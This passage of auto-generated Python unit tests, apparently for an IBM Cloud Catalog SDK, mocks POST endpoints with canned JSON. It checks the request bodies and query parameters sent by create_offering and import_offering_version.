    # Set up mock: register a canned 201 response for the POST endpoint.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
    mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.POST,
                  url,
                  body=mock_response,
                  content_type='application/json',
                  status=201)

    # Construct a dict representation of a Rating model
    rating_model = {}
    rating_model['one_star_count'] = 38
    rating_model['two_star_count'] = 38
    rating_model['three_star_count'] = 38
    rating_model['four_star_count'] = 38

    # Construct a dict representation of a Feature model
    feature_model = {}
    feature_model['title'] = 'testString'
    feature_model['description'] = 'testString'

    # Construct a dict representation of a Configuration model
    configuration_model = {}
    configuration_model['key'] = 'testString'
    configuration_model['type'] = 'testString'
    configuration_model['default_value'] = { 'foo': 'bar' }
    configuration_model['value_constraint'] = 'testString'
    configuration_model['description'] = 'testString'
    configuration_model['required'] = True
    configuration_model['options'] = [{ 'foo': 'bar' }]
    configuration_model['hidden'] = True

    # Construct a dict representation of a Validation model
    # NOTE: datetime-typed fields are supplied as ISO-8601 strings here;
    # the asserts below show they round-trip without fractional seconds.
    validation_model = {}
    validation_model['validated'] = "2019-01-01T12:00:00Z"
    validation_model['requested'] = "2019-01-01T12:00:00Z"
    validation_model['state'] = 'testString'
    validation_model['last_operation'] = 'testString'
    validation_model['target'] = {}

    # Construct a dict representation of a Resource model
    resource_model = {}
    resource_model['type'] = 'mem'
    resource_model['value'] = { 'foo': 'bar' }

    # Construct a dict representation of a Script model
    script_model = {}
    script_model['instructions'] = 'testString'
    script_model['script'] = 'testString'
    script_model['script_permission'] = 'testString'
    script_model['delete_script'] = 'testString'
    script_model['scope'] = 'testString'

    # Construct a dict representation of a VersionEntitlement model
    version_entitlement_model = {}
    version_entitlement_model['provider_name'] = 'testString'
    version_entitlement_model['provider_id'] = 'testString'
    version_entitlement_model['product_id'] = 'testString'
    version_entitlement_model['part_numbers'] = ['testString']
    version_entitlement_model['image_repo_name'] = 'testString'

    # Construct a dict representation of a License model
    license_model = {}
    license_model['id'] = 'testString'
    license_model['name'] = 'testString'
    license_model['type'] = 'testString'
    license_model['url'] = 'testString'
    license_model['description'] = 'testString'

    # Construct a dict representation of a State model
    state_model = {}
    state_model['current'] = 'testString'
    state_model['current_entered'] = "2019-01-01T12:00:00Z"
    state_model['pending'] = 'testString'
    state_model['pending_requested'] = "2019-01-01T12:00:00Z"
    state_model['previous'] = 'testString'

    # Construct a dict representation of a Version model
    # (aggregates the configuration/validation/resource/script/entitlement/
    # license/state models built above)
    version_model = {}
    version_model['id'] = 'testString'
    version_model['_rev'] = 'testString'
    version_model['crn'] = 'testString'
    version_model['version'] = 'testString'
    version_model['sha'] = 'testString'
    version_model['created'] = "2019-01-01T12:00:00Z"
    version_model['updated'] = "2019-01-01T12:00:00Z"
    version_model['offering_id'] = 'testString'
    version_model['catalog_id'] = 'testString'
    version_model['kind_id'] = 'testString'
    version_model['tags'] = ['testString']
    version_model['repo_url'] = 'testString'
    version_model['source_url'] = 'testString'
    version_model['tgz_url'] = 'testString'
    version_model['configuration'] = [configuration_model]
    version_model['metadata'] = {}
    version_model['validation'] = validation_model
    version_model['required_resources'] = [resource_model]
    version_model['single_instance'] = True
    version_model['install'] = script_model
    version_model['pre_install'] = [script_model]
    version_model['entitlement'] = version_entitlement_model
    version_model['licenses'] = [license_model]
    version_model['image_manifest_url'] = 'testString'
    version_model['deprecated'] = True
    version_model['package_version'] = 'testString'
    version_model['state'] = state_model
    version_model['version_locator'] = 'testString'
    version_model['console_url'] = 'testString'
    version_model['long_description'] = 'testString'
    version_model['whitelisted_accounts'] = ['testString']

    # Construct a dict representation of a Deployment model
    deployment_model = {}
    deployment_model['id'] = 'testString'
    deployment_model['label'] = 'testString'
    deployment_model['name'] = 'testString'
    deployment_model['short_description'] = 'testString'
    deployment_model['long_description'] = 'testString'
    deployment_model['metadata'] = {}
    deployment_model['tags'] = ['testString']
    deployment_model['created'] = "2019-01-01T12:00:00Z"
    deployment_model['updated'] = "2019-01-01T12:00:00Z"

    # Construct a dict representation of a Plan model
    plan_model = {}
    plan_model['id'] = 'testString'
    plan_model['label'] = 'testString'
    plan_model['name'] = 'testString'
    plan_model['short_description'] = 'testString'
    plan_model['long_description'] = 'testString'
    plan_model['metadata'] = {}
    plan_model['tags'] = ['testString']
    plan_model['additional_features'] = [feature_model]
    plan_model['created'] = "2019-01-01T12:00:00Z"
    plan_model['updated'] = "2019-01-01T12:00:00Z"
    plan_model['deployments'] = [deployment_model]

    # Construct a dict representation of a Kind model
    kind_model = {}
    kind_model['id'] = 'testString'
    kind_model['format_kind'] = 'testString'
    kind_model['target_kind'] = 'testString'
    kind_model['metadata'] = {}
    kind_model['install_description'] = 'testString'
    kind_model['tags'] = ['testString']
    kind_model['additional_features'] = [feature_model]
    kind_model['created'] = "2019-01-01T12:00:00Z"
    kind_model['updated'] = "2019-01-01T12:00:00Z"
    kind_model['versions'] = [version_model]
    kind_model['plans'] = [plan_model]

    # Construct a dict representation of a RepoInfo model
    repo_info_model = {}
    repo_info_model['token'] = 'testString'
    repo_info_model['type'] = 'testString'

    # Set up parameter values
    catalog_identifier = 'testString'
    id = 'testString'
    rev = 'testString'
    # NOTE: 'url' is rebound here from the mock endpoint URL to the
    # offering's 'url' body field; responses.add() above has already
    # captured the endpoint, so the rebinding is safe.
    url = 'testString'
    crn = 'testString'
    label = 'testString'
    name = 'testString'
    offering_icon_url = 'testString'
    offering_docs_url = 'testString'
    offering_support_url = 'testString'
    tags = ['testString']
    keywords = ['testString']
    rating = rating_model
    created = string_to_datetime('2019-01-01T12:00:00.000Z')
    updated = string_to_datetime('2019-01-01T12:00:00.000Z')
    short_description = 'testString'
    long_description = 'testString'
    features = [feature_model]
    kinds = [kind_model]
    permit_request_ibm_public_publish = True
    ibm_publish_approved = True
    public_publish_approved = True
    public_original_crn = 'testString'
    publish_public_crn = 'testString'
    portal_approval_record = 'testString'
    portal_ui_url = 'testString'
    catalog_id = 'testString'
    catalog_name = 'testString'
    metadata = {}
    disclaimer = 'testString'
    hidden = True
    provider = 'testString'
    repo_info = repo_info_model

    # Invoke method
    response = _service.create_offering(
        catalog_identifier,
        id=id,
        rev=rev,
        url=url,
        crn=crn,
        label=label,
        name=name,
        offering_icon_url=offering_icon_url,
        offering_docs_url=offering_docs_url,
        offering_support_url=offering_support_url,
        tags=tags,
        keywords=keywords,
        rating=rating,
        created=created,
        updated=updated,
        short_description=short_description,
        long_description=long_description,
        features=features,
        kinds=kinds,
        permit_request_ibm_public_publish=permit_request_ibm_public_publish,
        ibm_publish_approved=ibm_publish_approved,
        public_publish_approved=public_publish_approved,
        public_original_crn=public_original_crn,
        publish_public_crn=publish_public_crn,
        portal_approval_record=portal_approval_record,
        portal_ui_url=portal_ui_url,
        catalog_id=catalog_id,
        catalog_name=catalog_name,
        metadata=metadata,
        disclaimer=disclaimer,
        hidden=hidden,
        provider=provider,
        repo_info=repo_info,
        headers={}
    )

    # Check for correct operation
    assert len(responses.calls) == 1
    assert response.status_code == 201

    # Validate body params: decode the captured request body and check
    # every field was serialized exactly as supplied.
    req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
    assert req_body['id'] == 'testString'
    assert req_body['_rev'] == 'testString'
    assert req_body['url'] == 'testString'
    assert req_body['crn'] == 'testString'
    assert req_body['label'] == 'testString'
    assert req_body['name'] == 'testString'
    assert req_body['offering_icon_url'] == 'testString'
    assert req_body['offering_docs_url'] == 'testString'
    assert req_body['offering_support_url'] == 'testString'
    assert req_body['tags'] == ['testString']
    assert req_body['keywords'] == ['testString']
    assert req_body['rating'] == rating_model
    # Datetimes serialize to ISO-8601 without fractional seconds.
    assert req_body['created'] == "2019-01-01T12:00:00Z"
    assert req_body['updated'] == "2019-01-01T12:00:00Z"
    assert req_body['short_description'] == 'testString'
    assert req_body['long_description'] == 'testString'
    assert req_body['features'] == [feature_model]
    assert req_body['kinds'] == [kind_model]
    assert req_body['permit_request_ibm_public_publish'] == True
    assert req_body['ibm_publish_approved'] == True
    assert req_body['public_publish_approved'] == True
    assert req_body['public_original_crn'] == 'testString'
    assert req_body['publish_public_crn'] == 'testString'
    assert req_body['portal_approval_record'] == 'testString'
    assert req_body['portal_ui_url'] == 'testString'
    assert req_body['catalog_id'] == 'testString'
    assert req_body['catalog_name'] == 'testString'
    assert req_body['metadata'] == {}
    assert req_body['disclaimer'] == 'testString'
    assert req_body['hidden'] == True
    assert req_body['provider'] == 'testString'
    assert req_body['repo_info'] == repo_info_model
@responses.activate
def test_create_offering_required_params(self):
    """
    test_create_offering_required_params()

    Invoke create_offering() with only the required path parameter and
    verify the request is made and the mocked 201 response is returned.
    """
    # Set up mock: register a canned 201 response for the POST endpoint.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
    mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.POST,
                  url,
                  body=mock_response,
                  content_type='application/json',
                  status=201)

    # Set up parameter values
    catalog_identifier = 'testString'

    # Invoke method with only the required positional parameter
    response = _service.create_offering(
        catalog_identifier,
        headers={}
    )

    # Check for correct operation
    assert len(responses.calls) == 1
    assert response.status_code == 201
@responses.activate
def test_create_offering_value_error(self):
    """
    test_create_offering_value_error()

    Verify create_offering() raises ValueError when a required parameter
    is omitted: each required param is set to None in turn and the call
    is expected to fail before any HTTP request is made.
    """
    # Set up mock: registered so that an (unexpected) successful call
    # would still be served a valid 201 response.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
    mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.POST,
                  url,
                  body=mock_response,
                  content_type='application/json',
                  status=201)

    # Set up parameter values
    catalog_identifier = 'testString'

    # Pass in all but one required param and check for a ValueError.
    # BUGFIX: compare keys with `!=` rather than `is not` — identity
    # comparison on strings only works by accident of CPython interning.
    req_param_dict = {
        "catalog_identifier": catalog_identifier,
    }
    for param in req_param_dict:
        req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
        with pytest.raises(ValueError):
            _service.create_offering(**req_copy)
class TestImportOfferingVersion():
    """
    Test Class for import_offering_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        Returns the URL unchanged unless it ends with slash(es), in which
        case a compiled regex matching any number of trailing slashes is
        returned instead.
        """
        match = re.fullmatch('.*/+', request_url)
        if match is None:
            return request_url
        return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_import_offering_version_all_params(self):
    """
    import_offering_version()

    Invoke import_offering_version() with every supported parameter and
    verify both the query-string serialization and the JSON body.
    """
    # Set up mock: register a canned 201 response for the POST endpoint.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/version')
    mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.POST,
                  url,
                  body=mock_response,
                  content_type='application/json',
                  status=201)

    # Set up parameter values
    catalog_identifier = 'testString'
    offering_id = 'testString'
    tags = ['testString']
    target_kinds = ['testString']
    # 'content' is binary; the assertion below shows it is transmitted
    # base64-encoded in the JSON body.
    content = b'This is a mock byte array value.'
    zipurl = 'testString'
    target_version = 'testString'
    include_config = True
    is_vsi = True
    repo_type = 'testString'

    # Invoke method
    response = _service.import_offering_version(
        catalog_identifier,
        offering_id,
        tags=tags,
        target_kinds=target_kinds,
        content=content,
        zipurl=zipurl,
        target_version=target_version,
        include_config=include_config,
        is_vsi=is_vsi,
        repo_type=repo_type,
        headers={}
    )

    # Check for correct operation
    assert len(responses.calls) == 1
    assert response.status_code == 201

    # Validate query params: decode the captured URL's query string and
    # check each optional parameter was serialized (booleans as
    # lowercase 'true'/'false').
    query_string = responses.calls[0].request.url.split('?',1)[1]
    query_string = urllib.parse.unquote_plus(query_string)
    assert 'zipurl={}'.format(zipurl) in query_string
    assert 'targetVersion={}'.format(target_version) in query_string
    assert 'includeConfig={}'.format('true' if include_config else 'false') in query_string
    assert 'isVSI={}'.format('true' if is_vsi else 'false') in query_string
    assert 'repoType={}'.format(repo_type) in query_string

    # Validate body params: 'content' arrives as its base64 encoding.
    req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
    assert req_body['tags'] == ['testString']
    assert req_body['target_kinds'] == ['testString']
    assert req_body['content'] == 'VGhpcyBpcyBhIG1vY2sgYnl0ZSBhcnJheSB2YWx1ZS4='
@responses.activate
def test_import_offering_version_required_params(self):
    """
    test_import_offering_version_required_params()

    Exercise import_offering_version() with only its required path
    parameters and verify a single successful POST round-trip.
    """
    # Register a mocked POST endpoint returning a canned Offering payload.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/version')
    mock_response = (
        '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", '
        '"delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": '
        '"disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    )
    responses.add(
        responses.POST,
        url,
        body=mock_response,
        content_type='application/json',
        status=201,
    )

    # Required path parameters only; every optional argument is omitted.
    catalog_identifier = 'testString'
    offering_id = 'testString'

    # Invoke the operation under test.
    response = _service.import_offering_version(
        catalog_identifier,
        offering_id,
        headers={},
    )

